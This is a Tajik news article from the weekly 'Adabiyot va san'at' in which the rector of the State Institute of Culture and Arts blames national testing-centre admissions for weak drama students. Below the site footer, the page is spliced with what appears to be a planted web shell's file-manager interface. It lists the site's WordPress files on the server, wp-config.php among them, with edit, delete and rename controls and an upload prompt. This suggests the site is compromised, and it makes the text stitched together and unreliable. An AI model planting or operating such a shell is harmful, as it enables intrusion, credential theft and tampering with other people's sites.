22.4 C
Душанбе

Донишкадаи фарҳанг ва санъат: Драматургони ҷавонро интизорем

Дар Донишкадаи давлатии фарҳанг ва санъати Тоҷикистон ба номи Мирзо Турсунзода солиёни зиёд аст шуъбаи драматургия фаъолият мекунад, аммо аз чӣ бошад, ки наметавонад драматургони ҳирфаиро ба ҷомеа пешниҳод намояд. Дар нишасти матбуотӣ, ки 7-уми феврал дар донишкадаи мазкур баргузор гардид, хабарнигори ҳафтаномаи “Адабиёт ва санъат” ин масъаларо ба миён гузошт. Посухи ректори донишкада Муҳриддин Низомӣ чунин буд:

– Сабаби муваффақ нашудани мо дар самти тарбияи драматургони ҷавон ин аст, ки қабули донишҷӯён тариқи Маркази миллии тестӣ сурат мегирад. Душвор аст тавассути Маркази миллии тестӣ пайдо кардани донишҷӯёни дар ҳақиқат сазовор ба ин бахш. Ҳарчанд барои корҳои фаҳмондадиҳӣ дар муассисаҳои таълимӣ ва шинос намудани довталабони оянда бо бахшу шуъбаҳое, ки дар донишкадаи мо фаъолият менамоянд, борҳо устодони соҳибтаҷриба ва соҳибихтисос пешбарӣ шуда бошанд ҳам, довталабоне, ки ба шуъбаи мазкур дохил мешаванд, дониши казоӣ надоранд ва баъд аз чанд моҳи таҳсил тарки шуъба ё донишкада мекунанд. Устодон аз дониши сусти довталабон дар шуъбаҳои дигари эҷодӣ чун риштаи актёрӣ низ пайваста шикоят менамоянд. Ба гуфтаи онҳо, баъзе аз донишҷӯёни тавассути Маркази миллии тестӣ қабулгардида ҳатто қобилияти хондани китобро надоранд. Раёсати донишкада чанд маротиба ба Вазорати фарҳанги ҷумҳурӣ муроҷиат намуд, то ки имтиҳонҳои шуъбаҳои эҷодии донишкада аз Маркази миллии тестӣ бардошта ва ба уҳдаи устодони соҳа вогузошта шавад, аммо мутаассифона, ин талаби мо ба иҷро расонида намешавад. Дар Маркази миллии тестӣ кластери мо бо кластери факултаҳои филологияи дигар муассисаҳои олӣ (Донишгоҳи миллии Тоҷикистон ва Донишгоҳи омӯзгорӣ дар назар аст) дар як рӯйхат меистанд ва довталабони дорои дониши васеътар, ки холҳои балантарро соҳиб мегарданд, ба ин донишгоҳҳо дохил мешаванд. Довталабоне, ки ба донишкадаи мо меоянд, аксаран онҳоеанд, ки холҳои нисбатан пастро ба даст овардаанд ва табиист, ки қуввату тавонашон барои идомаи таҳсил намерасад.

Тавре ба ҳама маълум аст, драматургия омӯзиш ва мутолиаи зиёдро талаб мекунад.

Мижгон ХАЛИЛЗОДА, “АС”

мақолаи гузашта
мақолаи навбатӣ
- Таблиғ -spot_img

Быть в курсе

Подпишитесь на обновления материалов сайта adab.tj на ваш электронный ящик.

- Таблиғ -spot_img

Хабарҳои охир

Акси гӯё

Бахшҳо

Current Dir: /var/www/adab.tj/html/

[FILE] .htaccess [ edit | delete | rename ]
[FILE] index.php [ edit | delete | rename ]
[FILE] license.txt [ edit | delete | rename ]
[FILE] readme.html [ edit | delete | rename ]
[FILE] wordpress-6.7.1-ru_RU.zip [ edit | delete | rename ]
[FILE] wp-activate.php [ edit | delete | rename ]
[DIR]  wp-admin [ delete | rename ]
[FILE] wp-blog-header.php [ edit | delete | rename ]
[FILE] wp-comments-post.php [ edit | delete | rename ]
[FILE] wp-config-sample.php [ edit | delete | rename ]
[FILE] wp-config.php [ edit | delete | rename ]
[DIR]  wp-content [ delete | rename ]
[FILE] wp-cron.php [ edit | delete | rename ]
[DIR]  wp-includes [ delete | rename ]
[FILE] wp-links-opml.php [ edit | delete | rename ]
[FILE] wp-load.php [ edit | delete | rename ]
[FILE] wp-login.php [ edit | delete | rename ]
[FILE] wp-mail.php [ edit | delete | rename ]
[FILE] wp-settings.php [ edit | delete | rename ]
[FILE] wp-signup.php [ edit | delete | rename ]
[FILE] wp-trackback.php [ edit | delete | rename ]
[DIR]  www [ delete | rename ]
[FILE] xmlrpc.php [ edit | delete | rename ]

Upload File: